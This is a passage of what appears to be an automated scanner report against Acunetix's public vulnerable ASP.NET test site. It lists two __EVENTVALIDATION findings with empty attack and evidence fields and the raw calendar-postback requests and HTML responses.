style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1109 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,109 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8465&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAqrrVHdsIZGRkUKN33oukto1lrN4O6l%2Foyz60wFk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKSsoCsBgLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJmovB23KS9PMXnY4Nz5WUyr4zqzQ%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:07:31 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAqrrVHdsIZGRkUKN33oukto1lrN4O6l/oyz60wFk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKSsoCsBgLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJmovB23KS9PMXnY4Nz5WUyr4zqzQ=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:White" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1109 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,109 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8473&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAA%2BA0fJNsIZGRkRKxVAGIvZFeS3yZzvaIxsC1VXhI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKsxuLRDQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJdgaIUIDVZrZ3PaticrBL91PYZOo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:30:52 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAA+A0fJNsIZGRkRKxVAGIvZFeS3yZzvaIxsC1VXhI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsxuLRDQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJdgaIUIDVZrZ3PaticrBL91PYZOo=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:White" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. 